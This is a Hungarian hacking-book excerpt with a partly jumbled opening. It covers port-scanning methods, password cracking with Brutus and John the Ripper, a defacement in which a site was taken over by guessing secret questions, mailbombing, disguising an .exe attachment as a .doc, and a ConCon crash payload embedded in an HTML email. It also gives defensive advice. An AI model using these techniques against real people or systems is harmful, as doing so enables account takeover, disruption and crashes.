2. RST-ACK. és visszadják a rendszer válaszait. amelynek a célja TCP alapú szervizeket/szolgáltatásokat találni.2. No persze nem a hagyományos értelemben vett szkennelésről van szó. a hacker pedig észrevétlen szeretne maradni. hogy minden portot le lehet-e szkennelni. A szkenner A szkenneléshez szükség van egy portszkennerre. Ha a szkennelt számítógép biztonsági és felügyeleti státusza csekély. hogy minden időkeretet túllépne. A szkennelés az egyik legfontosabb módszer egy rendszer gyenge pontjainak a felismerésére. A rendszer minden jogosultságával rendelkező rendszergazda teljes áttekintést szeretne kapni. illetve portját szólítják meg.A rések keresése 6. hanem a SYN-ACK megerősítés után egy elérhető sockettől RST-ACK-val rögtön megszakítják a kapcsolatot. hogy egy rendszer minél több csatolófelületét. hogy kitalálják. Emellett a portszkennelés arra is szolgál. ha elérhető. különben nehezen érthetők az összefüggések. mielőtt munkához látna. akkor nem fogják észrevenni ezt a szkennelést. A szkennerek kérdéseket küldenek a portoknak. hogy nagyon gyorsan vezet eredményre. A következő magyarázatok feltételezik a közkedvelt protokollok alapismereteit. A szkenner egy TCP/IP csomagot küld SYN-flaggel a számítógépnek (a flagek [zászlók] speciális ismertetőjelek a csomag TCP-headerében). 6. 6.6 Szkennelés . Ehhez a következőképpen járnak el: a szkenner. Közben különböző információkat gyűjtenek. akkor az elérhetőnek számít.mindkettő a Linux alatt gyökerezik. melyek engedik meg kapcsolat felépítését. A legismertebb szkennerek közé tartozik a Nessus és az nmap . amelyek mellett a feladatot meg kell oldani.2 Félig nyitott TCP-szkennelés A félig nyitott szkennelésnél nem állítanak elő teljes kapcsolatot a hosthoz. Minden hacker elvégzi a portszkennelést a célrendszerén. A portszkennek a támadók legfontosabb eszközei. lehetőleg gyorsan. és a kapcsolat létrejött. és kérdéses lenne. a host visszajelzése pedig. Éppen ezért a szkenner multi-socket eljárást alkalmaz. lehetségesek-e anonim loginek. hogy a rendszergazdák ellenőrizzék rendszerük biztonságát. Az mindenesetre biztos. amelynél egyidejűleg nagyon sok kérdést tud feltenni. hogy Unix alatt csak az tud végrehajtani ilyen eljárást. Ezen a módon persze nagyon sokáig tartana minden kapcsolatot felépíteni és azután befejezni. Ebben az esetben a szkenner ismét ACK-val válaszol. Ennek az eljárásnak az előnye. az azoktól a feltételektől függ. 6. de időközben már Windowshoz is kifejlesztették.1. illetve a kliens megpróbál teljes kapcsolatot felépíteni a host minden portjához. hogy milyen szolgáltatások futnak a rendszeren. mert nagyon feltűnő. ha nem érhető el a port. akkor SYN-ACK. Az előnye viszont. Hogy ezek közül melyiket választják. Ha a szkenner ezeknél a kísérleteknél egy porttól feleletet kap. Ezért minden rendszergazdának jól kell ismernie a szkennereket.1 Szkennelés teljes TCP-kapcsolattal Itt egy olyan szkennelési eljárásról van szó. akinek root-jogai . fejezetben. és hogy megkövetelik-e a hitelesítést a hálózati szolgáltatások. többek között arról.2 Szkennelési eljárások Egy rendszer szkennelésére különböző lehetőségek kínálkoznak. és nagy valószínűséggel a támadó IP-címe is beíródna a rendszer logfájljaiba. A támadóknak azonban nem felel meg. hiszen e szó jelentés itt az. Ehhez minden fontos információ megtalálható a 3.

Try Again.13-as hibánál a port le van zárva. hogy milyen portok nyitottak és milyen operációs rendszer van telepítve. a UDP-Recvfrom-And-Write szkennelés egy normál módon bejelentkezett felhasználónak is lehetővé teszi. stb. hogy a hálózatokban az erre jogosult rendszeradminisztrátoron kívül senki se tudjon végrehajtani ilyen szkennelést alacsonyabb jogokkal.) futnak a rendszeren. Ehhez egy ICMP-ECHOcsomagot vagy egyszerűen egy pinget küldenek kölönböző IP-címekre. 6. megkapják az ICMP PORT UNREACH üzeneteket. Természetesen ez az eljárás is nagyon időigényes. amelyik a UDP-ICMP-PORT-UNREACH szkennelésre ICMP-PORT-UNREACH választ adott (amiről normál felhasználóként nem értesülünk).8 A nyitott portok csak a kezdetet jelentik Ha találtatott egy rendszer nyitott portokkal. illetve rendszererőforrásaitól függ. Megvan tehát a cél. és várunk egy UDP-ICMP-PORT-UNREACH üzenetre.5 UDP-lCMP-Port-Unreachable szkennelés Az UDP. hogy melyik hostok elérhetők. A háttérben ismét egy bug áll: ha megpróbálunk egy portra írni. a Microsoft operációs rendszereknél a TCP-implementációnak nincs ilyen fajta hibája.2. Tehát szkenneljük a portokat. Ezeket a szkenneléseket csak a rendszergazda tudja elvégezni. Csak a lezárt port küld vissza egy üzenetet. Ha a számok valamelyike mögött van egy rendszer. 6.vannak. nem igazolja vissza a fogadást. más protokollokkal ellentétben. Telnet. ezért lehet a TCP-FIN szkennel könnyen kideríteni a nyitott portokat. HTTPS. A támadók most hozzákezdenének információkat gyűjteni a célrendszerről. hogy egy ICMP echo scanning/ping szkennelést hajtanak végre. illetve darabolódnak.2. Aszerint.3 TCP-FIN-Scan A TCP-FIN szkennelést a Unix alatti TCP-implementációk többségének egy hibája (bug) teszi lehetővé. amit sajnos. A szkennelésnek ez a módja azok közé a csekély számú eljárások közé tartozik. Ráadásul csak Linux alatt működik.4 Fragmentált szkennelés A fragmentált szkennelés a TCP-szkennelések egy további módja. 6. A szkennelésnek ez a módja nagyon hosszadalmas.7 ICMP-echo-scanning/ping-szkennelés A szkennelésnek ez a módja csak azt állapítja meg. Ez gondoskodik ugyanis arról. egyszer. Ezek a „letapogatások" azonban csak Unix alatt működnek.6 UDP-Recvfrom-And-Write szkennelés Ellentétben a UDP-ICMP-PORT-UNREACH szkenneléssel. hogy a fennálló kapcsolatot annak rendje és módja szerint bezárják. . a támadó utánanéz a megfelelő kihasználási lehetőségeknek.Connection refused üzenet helyett. akkor többnyire ezt az üzenetet kapjuk: Error 13 . hogy a port nem elérhető. Ennél a TCP-csomagok több kis csomagra fragmentálódnak. amelynél csak azok a userek kapnak pozitív visszajelzést.2.2. A FIN-csomagokat arra használják. és másodszor. hogy nem fogja-e egy tűzfal felfedezni a portszkennelést. és gyakran megbízhatatlan. akik rootként vannak bejelentkezve.2. a nyitottak ezt nem teszik. hogy a számítógép kiadjon egy választ. HTTP. Ez azt jelenti. akik rootként vannak bejelentkezve. Ezen a módon lehet meggyőződni arról. hogy „érdekes" jelzéseket kapjon. amelyek nem feltűnőek. Ez az operációs rendszernél kezdődik. hogy találjanak egy hostot. 6. hogy milyen szervizek (FTP. és a pontossága nagy mértékben a szkennelt számítógép kihasználtságától. és azok a felhasználók. amelyen a támadó a legkülönbözőbb szkennelésekkel réseket kereshet. Ennél az eljárásnál tehát minden portot kétszer szkennelnek. 6. amely a számítógépen fut. 6. a normál Error 111 . A szkennelendő portra egy TCP-csomagot küldenek egy FIN-csomaggal. mielőtt még egy megtalált rendszeren el lehetne indítani a tulajdonképpeni portszkennelést.2. A lezárt portok RSTcsomaggal válaszolnak a FIN-csomagra. az ICMP-ECHO-REPLY csomaggal válaszol. hogy mégis kapjunk informatív visszajelzést . nem látunk. hiszen system admin jogok kellenek hozzá. akkor egy portlista segítségével lehet áttekintést kapni arról.

már akkor is. ameddig lehetséges.2. inaktívan kellene tartani. amelyek feljegyzik a portszkenneket. mint amilyen a Norton Internet Security. a Windows-megosztásokat a Windows-rendszerek gyenge pontjairól szóló fejezetben). A legjobb védelem. ha a szkennelés nem talál nyitott portokat. Ez azonban többnyire nehezen kivitelezhető. Itt a tűzfalak segítenek. port elérhetőségét (lásd. hogy egy rendszert szkenneljen. hogy megtalálják és analizálják a célrendszerüket. vagy egy csatlakoztatott hálózat miatt biztosítania kell a 139. amelyet a betörők végrehajtanak. ha valaki például egy FTP-szervert működtet a rendszerén. vagy portscan detektorok. amint TCP-kapcsolatok érkeznek be. . amelyek nélkül a betörés lehetetlen volna.9 A portszkennelés elleni védelem A szkennelés többnyire az első lépés. Ezért fontos védekezni a portszkennelés ellen. hogy figyelmeztető üzenetet küldjenek. hogy azonosítani lehessen a lehetséges támadót. Természetesen nagyon nehéz valakit visszatartani attól. hogy ne kínáljunk támadási felületet. illetve naplóztatni a szkenneléseket. A tűzfalakat arra is be lehet állítani. Naplóz a Norton Internet Security A tűzfalaknak olyan protokoll-funkcióik vannak. mint például a BlackICE. Tehát minden szolgáltatást.6. Ezen keresztül számos fontos információt begyűjthetnek. mielőtt még hozzákezdene a tulajdonképpeni támadáshoz. és megpróbálkoznak egy portra kapcsolódni.

5 A John legfontosabb parancsai 7.2 A szólista módszer 7.1 Ismert felhasználói nevek jetszavainak a kitalálása 7.7.3.2 Beállítások áttekintése 7.2 7.4.4.Tartalom 7.4 External mód 7.4.1 7.4.4.4 Jelszavak megfejtése a John the Ripperrel 7.6 A jelszófájl Single Mode .1 7. fejezet .3 Incremental mód 7.3.4.3 Hackelt security-site .jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők 7.

a „biztos jelszó" sem fog kimaradni. A másik lehetőség: a jó szerencsében bízva egyszerűen megpróbálkozni néhány jelszóval. a második a Denic-nél (www. A hacker most a webtárhely szolgáltatójától kapott mail-eket kereste. Itt a következő történt.de) szolgáltatónál szerepelt kontaktcímként.3 pontjából derül ki. És nézzenek oda: ez megint telitalálatnak bizonyult. 7.1 Hackelt security-site jelszófeltöréssel ez is lehetséges Egy ismert példa a th-security „átváltozása" (deface) volt. Ez történhet mondjuk egy telefonhívással. és megváltoztatná a kontaktcímét. Hogy hogyan is működnek ezek a programok. hihetetlen. Az áldozat. De ez biztosan feltűnne a felhasználónak. hamar rájött. hogy a kérdés mindkét postafióknál így hangzott: Mi a keresztnevem? Az oldalon megadott kontaktcímből. Az első címet kontaktcímként adta meg a weboldalon. és a jelszóválasztás biztonságát a középpontba állítani.flieger@dmx.de. hogy egy jelszó ne legyen túl egyszerű.puretec. mivel az interneten és a helyi számítógépeken is gyakran védik jelszavakkal a fájlokat a jogosulatlan hozzáférések ellen. Tehát fogta Tobias-t. a www. Most egy kicsit körülnézett a GMX felhasználói menüben. amivel ilyenkor eljárnak. Hogy ezek után mit csinált az oldalból? íme az eredmény: Ez a fejezet a jelszavak biztonságosságát tárgyalja. Kutatás közben megállapítot- Itt egy honlap volt . hogy ismeretlenek olyan információkat csaljanak ki tőlünk. A támadó először megnézte a GMX-titkos kérdést. Ezért itt csak a valóban fontos információkat szeretnénk bemutatni. A jelszavak kiderítésére. egy ismert biztonsági és trójai információs oldal. amelyet a GMX-adatokból megtudott. mert a Puretec általában havonta egyszer mail-ben elküldi a számlainformációkat. az a fejezet 7. hogy milyen névről van szó.haennle@gmx.7 Jelszófeltörés ta. amelyeket senkinek sem adnánk meg önként. A jelszófeltörésről oldalakat lehetne írni.az első: várni pár napot egy mail-re a szolgáltatótól. hogy a webmesternek két GMX-fiókja van: tobias. és máris büszke tulajdonosa lett egy GMX-accountnak. amire szüksége volt ahhoz. amelyen semmiféle scripthibát vagy szerverhibát nem lehetett találni. így két lehetőség adódott . illetve feltörésére különböző lehetőségek vannak. amely egy lista segítségével minden lehetséges variációt megjátszik.kulcsszó: email-cím. Tehát a hackernek más eszközökhöz kellett folyamodnia. A hackereknek változatlanul az okos jelszavas védelem jelenti az egyik legnagyobb akadályt.denic.. tehát tobias. amelyet egy m \ r3nda nevű hacker kinézett magának. A legfontosabb azonban az.de (a címeket az adatvédelem miatt megváltoztattuk). mert a legtöbb felhasználó nagyon lazán veszi a jelszó kiválasztását.haennle@gmx. amelyben a főnökünk keresztnevét kérdezik . A kreativitás.de volt. A klasszikus jelszótörő egy olyan program. amelyekre a Social Enineeringhez szükség van.thsecurity. mert ezekben szerepelt az ügyfélszám.de) és a Puretec (www. hogy a Pureteckel „elfelejtett" jelszavakat lehessen a kontaktcímre küldetni. Az egyik legfontosabb a Social Engineering. A hacker a felhasználó születési dátumával kezdett. megváltoztatta a jelszót. Természetesen a jelszófeltörők elleni legjobb védelem. De nem voltak mail-ek a szolgáltatótól. és látta.de és pegasuss. ahol a valódi tulajdonos a nevétől kezdve a telefonszámáig tulajdonképpen minden adatot hátrahagyott. Tehát ne hagyjuk. amellyel a fontos adatok jelszó-tulajdonosoktól való megszerzését jelölik.

hogy hogyan válik lehetségessé egy „deface" a rosszul megválasztott titkos kérdés. • vegyesen kis. kml34Hs9. és ráírjuk a jelszót. A jó jelszavak • több mint tíz karakterből. POP3.). A jelszót kettő-négy hetente cserélni kell. amelyek benne lehetnek a jelszólistákban vagy a szótárakban. 7. A jelszót a legritkább esetben fejtik vissza. hogy a felhasználónak lehetővé tegyék. A Brutus jelszófeltörő internetaccountok valamennyi variánsához (FTP. • egy cetlit teszünk a billentyűzet alá vagy a monitorra. • semmi születési dátum és hasonlók. Telnet. Ezután ki lehet választani a támadás fajtáját. 7. a Brute Force-ot használják. E programok nem tesznek mást. és szükség szerint szólistákat is be leA Brutus program: minden beállítás egy lapon Teljesen értelmetlen a jelszóhasználat. A jelszavak megadásánál a következő alapszabályokat kellene betartani: • ne legyen öt karakternél rövidebb.2 Mire kell ügyelni a felhasználói oldalról? A legtöbb felhasználó nem túl ötletes egy értelmes jelszó kitalálásánál. • a jelszó egy fájlban van mentve a gépen. Ezért a rosszul választott jelszavak kihasználása a hackerek egyik legjobban elterjedt támadófegyvere. megváltoztatni a jelszavát. A Target mezőbe be kell írni a kikémlelendő fél URL-jét vagy IP-címét. az alkalmatlan jelszó révén. ha elfelejtette. mint nagyon nagy sebességgel próbálják ki az egyik lehetséges jelszót a másik után. pl. NetBios stb. • ne legyen szabványos. amelyek jelszavakat fednek fel. • semmi duplázás. tehát ne legyen „hhaalloo". mert így minden támadónak lehetővé tesszük a jelszavunk tetszés szerinti megváltozatását. Gyakran lehet ilyen kérdésekkel találkozni: „Mi a hideg ellentéte?" Ez természetesen rossz választás. hogy ki kerüljék az alkalmazott biztonsági intézkedéseket.3 A jelszófeltörők A jelszófeltörők olyan programok. A titkos kérdések legyenek titkosak Az interneten a különböző oldalak biztonságra ügyelő szolgáltatói jelszókérdések vagy titkos kérdések megadását kínálják. • alfanumerikus karaktersorból. Ezzel a fogással meghiúsíthatjuk a korábban kikémlelt jelszó felhasználását.Ez bizony egy nagyon jó példa arra. ehelyett egy névről nagyon jól ismert eljárást. Az internetjelszavak minden fajtájához szívesen használják. HTTP. . ha • mindenütt ugyanazt a jelszót használjuk. A Brute Force annyit jelent: nyers erőszak. • ne legyenek olyan szavak.és nagybetűkből állnak. amíg megtalálják az igazit. Egy példa az ilyesfajta programra a Brutus.

POP3. amely DES-sel (Data Encryption Standard) kódolt jelszavakat tud dekódolni. Ha a jelszavak kódolt állapotban egyeznek. combo-listával vagy Brute Force-szal.3. amelyre John the Rippernek szüksége van a jelszavak visszafejtéséhez. FTP. Az idő. Itt lehet egy szólistát betölteni. 7. ha elfelejtettük a fiók-jelszavunkat. hogy vissza lehessen követni a támadót.net. és helyette a shadow-fájlban tárolja). SMB (NetBOIS) stb. amelyet a Brutus mellé adnak. a támadásokhoz hasznos tulajdonság egy beépített proxy. telefonszám stb. Type: itt lehet kiválasztani a cél típusát. A John the Ripper szerény felhasználói felülete 7. amely úgy működik. ezért a program egyes verziói különböző processzorokra optimalizáltak. a . HTTP esetén a 80-as port. de nincs meg a hozzá tartozó jelszó. például név. A John működése azon alapul. és az eredményt összehasonlítja a megfejtendő jelszóval.3. amely megakadályozza. Single User: kiválasztva User ID: usernév (pl. HTTP. Method: HEAD KeepAlive: megjelölve. Jóska. FTP-nél a 21-es. Connection: meg lehet adni. Egy további. Use Username: kiválasztva. hogyan történjen a feltörés. hogy a jelszavakat eltávolítja a passwd fájlból. amelyek. a program ennél az eljárásnál csak egy user névvel próbálkozik. ha a jelszó a listán van. amelyeket a Brutus mellékel. a POP3 vagy FTP-account van. 7. amelyet előre meg lehet adni.het tölteni.4 Jelszavak megfejtése a John the Ripperrel A John the Ripper egy jelszófeltörő. 7.4. Port: a port megadása. A DES-kódolások felhasználásának egyik területét a Unix-jelszavak jelentik. pl: lol@gmx. hogy milyen módban indult el (single. Így lenne ez például akkor is. Telnet. a rendelkezésre álló processzor sebességétől függ. Itt lehet egy névlistát választani különböző user nevekből. itt lehet kiválasztani.txt.). incremental. azaz a userek személyes adatait. hogy milyen gyakran létesítsen kapcsolatot a program. szólista. Pass Mode: szólista. Use Proxy: nincs kiválasztva. Lehet szólistával.2 Beállítások áttekintésére Target: a host URL-je vagy IP-je. jelszóként felhasználni. a Brutus itt lehetővé teszi egy proxy bejegyzését. Még ha a passwd fájlban az adatok „árnyékolva" is vannak (ez a bizonyos shadowing az újabb Linux/Unix verziók biztonsági intézkedése. aszerint. igencsak megrövidítik a feltörést.1 Single Mode Ebben a módban a John megpróbálja a jelszófájlban tárolt GECOSinformációkat (General Electric Comprehensive Operating System). Timeout: megadható. external).. mert az már ismert.1 Ismert felhasználói nevek jelszavainak a kitalálása Mint már a neve is mutatja. Pass Fik: words. amelyen pl. hogy a megadott jelszólehetőségeket például DES-sel kódolja. mert mindkettőnél ugyanazt a kódolási eljárást (DES) alkalmazták. Fercsi stb. hogy mennyi idő múlva szakítsa meg a program a kapcsolatot. akkor visszafejtve is egyezniük kell.

mert teljes mértékben konfigurálni kell. adminspecifikus szólistákat előállítani.4.GECOS-információk azonban még mindig a passwd fájlban vannak. Ebben az esetben az Unshadow program segít. hogy a szólista ábécé-sorrendben legyen.4. hogy minden sorban csak egyetlen karakterfüzér legyen. kódolva=john:GjstuOeYjOEhc). 7. ábécé-sorrendbe rendezik.6 A jelszófájl Ennek a fájlnak tartalmaznia kell a megfejtendő jelszavakat a hozzájuk tartozó felhasználó-nevekkel. Minden létező jelszót.4. hogy a szükséges idő (a processzor teljesítményétől. Ez a parancs szólista módban indítja a Johnt. különleges karakterekből. ha az egymás után következő szavak vagy karaktersorozatok nem különböznek túlzottan egymástól (vannak programok. mert minden rendkelkezésre álló információt fel lehet használni. vissza tud fejteni úgy. Arra is ügyelni kell. Ezeket kettősponttal elválasztva. mert minden felhasználó GECOS-információját az összes többinél is kipróbálja jelszóként. végül incremental módban futtatja le a Johnt. Erre a parancsra mutatja meg a program a megfejtett jelszavakat. A john parancs kilistáz minden lehetséges paramétert. a szólista német részét ebben az esetben el lehet hagyni.3 Incremental mód Ez a John leghatalmasabb üzemmódja. Ezt az eljárást Brute Force-nak is nevezik. 7. 7. Ha a single módot kell használni.2 A szólista módszer Ennek a módszernek a hatékonysága teljes mértékben a felhasznált szólista méretétől és főleg a minőségétől függ. így lehet szerver.ill. ezért nem szabad alábecsülni. 7. vagy eltávolítják a dupla bejegyzéseket). akkor a GECOS-információknak és a user-könyvtár elérési útvonalának is mögötte kell állnia ( p l : john:OozDCtCCAa/lM:11202:0:99999:7:0:). hogy összevezeti a passwd fájlt és a shadow fájlt. hogy egy sorban mindig csak egy USERNAME:PASSWORD pár legyen. amelyek a szólisták kezelésében segítenek. a jelszó hosszától és a jelszóban használt karakterektől függően) nagyon hosszú is lehet. Azt mindenesetre figyelembe kell venni.5 A John legfontosabb parancsai Parancs Leírás Ez a parancs single módban indítja a Johnt.4. Ez a mód természetesen csak akkor hatékony.4 External mód Ez a mód inkább tapasztalt felhasználóknak való. Hogy hány ilyen pár van a fájlban tárolva. hogy betűkből. mert a John egy kicsikét gyorsabban dolgozik. Minden parancs után meg kell még adni a jelszófájlt is. ha a felhasználók személyes információikat használják jelszóként. például több listát összefűznek. . És éppen ez adja ennek az eljárásnak a erősségét: mivel valószínűtlen. az nem túl lényeges. John fájlnév John -show Ez a parancs először single. a USERNAME: PASSWORD séma szerint kell tárolni. EXTERNAL: előtt definiált MODE tulajdonságokkal. Ez a parancs incremental módban indítja a Johnt. hanem normál kódolt állapotban kell lenniük (pl: árnyékolva= john:x vagy john:* . Ez a parancs external módban indítja a Johnt. ezért a jelszavakat és a GECOS-információkat megint csak egyetlen fájl tartalmazza. hogy egy ausztráliai szerver passwd fájlja német jelszavakat tartalmaz. A szólistát úgy kell felépíteni. a LIST. csak arra kell figyelni. hogy minden lehetséges kombinációt ellenőriz. számokból vagy kombinációkból áll. A jelszavak „árnyékolva" sem lehetnek. Ennek a módnak a hatékonysága a jelszófájl tartalmazta felhasználók számával növekszik. A John the Ripper legfontosabb parancsainak az áttekintése John -single John -i John -w:aszólistaneve John -e:MODE 7. majd szólista. Ez a módszer egyben nagyon gyors is. mégpedig úgy. függetlenül attól. és ezzel a siker valószínűségét növelni.4.

8.1.biztonsági kockázat? 8.1 E-mail-támadások 8.Tartalom 8.2. fejezet .praktikus és veszélyes 8.2 Milyen biztonsági rések vannak? .2.1.túlcsordul a postafiók 8.2 ICQ .1 Mailbombák .1.3 AConConbug 8.1 Az ICQ .2 A fájlmelléklet kitömése 8.

és víruslehetőségekről itt már nem beszélünk.1 E-mail-támadások Az e-mailek a legfontosabb kommunikációs bázist jelentik az interneten.1. vagy .8 Támadások az internet-felhasználók ellen Az internetet használók száma folyamatosan növekszik. Ennek alapján nem nyújtanak lehetőséget arra.1 Mailbombák .és drága . egyre újabb és újabb szolgáltatásokat kínálnak a számukra. hogy a mailbomba-támadások mögött mennyire van stratégia. Nehéz felmérni. hogy a feladó adatait ellenőrizni lehessen. A legtöbbek életéből már nem maradhat ki ez a médium. 8. Itt elsősorban az e-mailek és az ICQ biztonsági kockázatairól lesz szó. ha tudják.választás szerint hamis feladócímet is meg tudnak adni. tehát csak egyszerű szöveget szállítanak. hanem abban is. hogyan és milyen változatokban hajtanak végre támadásokat felhasználók ellen. amelyek sok felhasználóban nem is tudatosulnak. hogy a címzett postafiókja hamar túllépi a maximális kapacitását. Egy ilyen támadás azonban akár pénzügyileg is érinthet kisebb cégeket. Ennek természetesen az a következménye. Ugyanis elég időigényes . ha az embernek hirtelen 5000 nem kívánt mail-t kell törölni a postafiókjából. Egy egyedi felhasználónak főleg az idejét rabolhatják a bombázással. A mailbombázáshoz a támadók számos programból választhatnak. amelyeknek a saját PC-nk vagy akár a hálózat is ki van téve. hogy valaki hamis feladócímet adjon meg! A mailbombázók sajátos képességei tehát nemcsak abban nyilvánulnak meg. Ezt ugyanis. a szerver vissza fogja utasítani. amelyeknek fontos kommunikációs eszközt jelent az internet. és nem tud több mail-t fogadni. hogy egy fontos mail-re vár. Képzeljük csak el egy online bolt üzemeltetőjének a helyzetét. és a tartalmak is mind vonzóbbakká válnak.túlcsordul a postafiók A mailbombák nem jelentenek közveden veszélyt az internet-használók adataira vagy saját számítógéprendszereikre. mert mailbomba-támadás áldozata lett. hogy anonimek maradnak. hogy szinte egyidejűleg hallatlanul nagy számú mail-t tudnak küldeni a kívánt címre. S bizony roppant időrabló ténykedés eltávolítani a többnyire különösebb tartalom nélküli mail-ek százait. az a mailbombázók által gyakran használt SMTP és Telnet internetprotokollok (lásd az Alapok fejezetet) felépítésén múlik. Az interneteléréssel azonban növekednek azok a veszélyek. Ebben a tényben azonban veszélyek is rejlenek. E-mail-bombázó Arzytól szánthatják. aki nem kapja meg a megrendelés-maileket. Kiderül. A támadó anonim marad Hogy a mailbomba-támadások áldozatai nem tudnak közvetlenül a tettesekre támadni. ezeket az adott témának szentelt fejezetek tárgyalják. A különböző trójai. ezt pedig a hackerek kihasználják a rendszerek megtámadásához. inkább csak idegölők és zavarók. mivel a mailbox a támadás miatt túltelítődik. Ez a fejezet az internet-használat veszélyeinek és kockázatainak reálisabb felbecsülésében próbál segíteni. Ezek az adatátviteli protokollok az ASCII karakterkészletre korlátozzák a tartalmukat. akkor bosz- . 8. sőt még arra is van mód.lehet.

hogy előzőleg a merevlemezre kellene menteni.doc exe A hosszúsága miatt (amit az üres karakterek okoznak) az Outlook csak a Profil. amit közvetlenül is meg lehet nyitni az Outlookból.microsoft.BAT nevű mail-mellékletek veszélyesek lehetnek. a mailbombázó programoknak több szerverrendszert is meg kell adni. A csatolt fájl. Ezt egyébként azért teszik. az akaratuk ellenére. így a felhasználó feltételezheti. Ez megakadályozza.com/ címen egy Outlook-frissítést is kínál.doc-ot mutatja. hogy csak egy hagyományos Word-dokumentumról van szó. és feltelepül az esetleg hozzáfűzött vírus vagy trójai. 8. hogy először mentsük merevlemezre és ellenőriztessük vírusvizsgálóval az ismeretlen forrásból származó mail-ek csatolt fájljait. Ezáltal az egyes mail-szerverek túlterhelésének a kockázata is csökken. postásként fognak működni. amely még a mail-hez csatolt fájlok futtatása előtt figyelmeztetést küld a gyanús fájloknál. mint az AOL vagy a GMX. anélkül.EXE.egy mail kipufferolt fájlmelléklete . A szervezett mailbomba-akciók ezeknek a cégeknek a mail-postafiókjaira gyakran sikeresnek bizonyultak! Ezért a legtöbb mailszolgáltató ügyfél-postafiókjain ki lehet választani az antí-spam opciót. Ezen kívül a Microsoft a http://windowsupdate. hogy álcázzák a csatolt fájlt.így működnek a mailbombák Ahhoz. megkérdőjelezhető fájlcsatolásoknál Mailbomba-védelem A német online szolgáltatók. mint a Sub7 (lásd a trójaiakról szóló fejezetet). amelyek. Ráadásul egy ilyen tranzakció egyeden szerveren keresztül talán túl feltűnő lenne. még Word-ikont is tud varázsolni. Természetesen ebben az esetben azonnal elindul a megfelelő program. hogy felgyorsítsák az akár 10 ezer mail továbbítását. amelyek agresszív reklámjaikkal tűnnek fel az interneten. hogy az *. felhasználói biztosan jól ismerik az előbb említett mailreklámot. A csatolt fájlok elleni védelem A fent bemutatott fájlmellékletet nyilvánvalóan nem a Word dokumentum ikonja jelöli. a merevlemezre mentve. A felhasználó tehát figyeljen a megfelelő ikonra! Persze az elszánt hacker az olyan programokkal. Figyelmeztető üzenet az Outlooktól. és a munkát felosszák több különböző szerver között. a következőképpen néz ki: Profil. hogy a nyilvános ismeretterjesztés hatására sok felhasználó már tudja. hogy a címzetteknek továbbítsák a mail-eket.COM. *. az úgynevezett spam-et. Általánosságban érvényes.1. Ezért gyakran egy trükkhöz folyamodnak. s a további mail-akciókat zárolni lehetne erről a szerverről! Az utóbbi időben egyre több mailbomba-támadás összpontosít cégekre. Ártatlannak tűnik . hogy az elképesztő tömegű mail egyáltalán továbbítódjon a felhasználóhoz.2 A fájlmelléklet kitömése Vírusok és trójaik küldésénél a hackerek állandóan szembesülnek azzal a problémával. *.

de el nem menekülhetsz=20 előlem!<TOPMARGIN=3D1 50></H1Yó></CENTER><BR><CENTER> <IMG src= "\C: \Con \Con. UL. Az is ismert.1.</P></CENTER></BODY></HTML> ConCon-mailnézet egy erre a búgra rezisztens Windows 2000rendszeren color: FF3300. font-weight: regular. Ez a Windows 95/98/98 SE Windows kernelének egy hibájára épül. DD. = LI { color: FF3300. } ? { </STYLE> <META content=3D'"MSHTML 4.=20 } hl { color: FF3300. Egy példa erre a híres Windows ConCon bug.3110.telekabel. font-weight: regular.</DIV> <CENTER><IMG align=3Dcenter alt=3D"Elfuthatsz. OL.8. A ConCon mail-ékben terjed beágyazott HTML-fájlokon keresztül. amely a foglalt eszköznevek meghívására vonatkozik. "Arial". ADDRESS. DIR. "Comic Sans MS"." height=3D116=20 src=3Dcid:005001bfc591$8d8c9fOO$23b02fd5@lol. font-family: "Tempus Sans ITC". PRE.gif> <P>Üzenetet ide beilleszteni. "Comic Sans MS". font-family: "Tempus Sans ITC". DT.72.charset=3Diso-8859-l = http-equiv=3DContent-Type><BASE=20 href=3Dftle://C: \Con \Con \> <STYLE> <'body.7"! name=3DGENERATOR> </HEAD> <BODYbgColor=3D#99ccffleftMargin=3D30topMargin=3D5> <DIV>&nbsp. hogy újra kell installálni az operációs rendszert.3 AConCon bug A csatolt fájlok mellett a mail-éknek is lehet veszélyes tartalmuk. amelyek például így nézhetnek ki: <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html. BLOCKQUOTE.de=20 width=3D617></CENTER><BR><BR><BR> <CENTER> <Hl>Elfuthatsz. font-size: 20pt. MENU. "Comic Sans MS". font-size: 30pt. BR. A ConCon „nagy kék halált" okoz. font-weight: regular. Ez veszélyes lehet a nem mentett adatok miatt. "Ariar. és újra kell indítani a PC-t. font-family: "Tempus Sans ITC". "Arial". DIV. P. font-size: 24pt. hogy ennek a hibának a többszöri fellépése kárt okozhat a Windows kernelben. aminek az a következménye.=20 } hl .

Windows ICQ Client v. egyszerűen a Find User alatt megadjuk a nevét. miután nagyon kényelmes és felhasználóbarát. Megjegyzés: A mail-támadásoktól eltekintve a számítógép Indítópult mappájába is előszeretettel másolnak ConCon-fájlt. .biztonsági kockázat? Az utóbbi időben elszaporodtak azok a vélemények. Ráadásul az ICQ-t ért különböző remote-buffer-overflow-k és DoStámadások is ismertek. A felhasználóknak észnél kell lenniük.1 Az ICQ . Az ICQ kiszolgálóelemei és egy Sub7 szerver -üzenet Védelem a ConCon ellen A http://www. az e-mail címét vagy a UIN-t. amikor bejelentkezik a kommunikációba.4. az IRC (InternetRelayChat) mellett az internet egyik legtöbbet használt chatrendszerévé fejlődött. az Offline. Manapság már majdnem 150 millió szám létezik. 3. A kapcsolati listára minden felhasználót bejegyezhetünk. hogy kinek adnak engedélyt és kinek nem a kontaktlistájukhoz. Tulajdonképpen a címünkhöz vagy az IP-nkhez hasonlítható. hogy csak a fontosabbakra szorítkozzunk. 8.2 ICQ . és kapcsolatba léphetünk vele. és a kérdésre. hogy ki van onlineban. Az ICQ biztonsági kockázata azonban sokkal inkább annak a rendszernek a biztonságosságán múlik.Ezt a mailt elég kijelölni és belenézni. amelyek biztonsági kockázatként jelölik meg az ICQ-t. Ezeket a hálóról származó eszközökkel lehet végrehajtani. hogy ez mit jelent). de az interneten egyre több program található. mert a felhasználókat a UIN-on keresztül tudják más felhasználók megtalálni és azonosítani. sőt MacOS-hoz és BeOS-hoz is van ilyen. a választék az Online. A státuszon lehet látni. minden alkalommal elindul ez a fájl. A kliense a legkülönbözőbb platformokon megtalálható. hogy a számítógép lefagyjon. akikkel rendszeresen szeretnénk kapcsolatot tartani. amelyen a kliens fut. hogy „Nem. amelyeknél a támadó üzenetek sokaságával bombázza az áldozatot 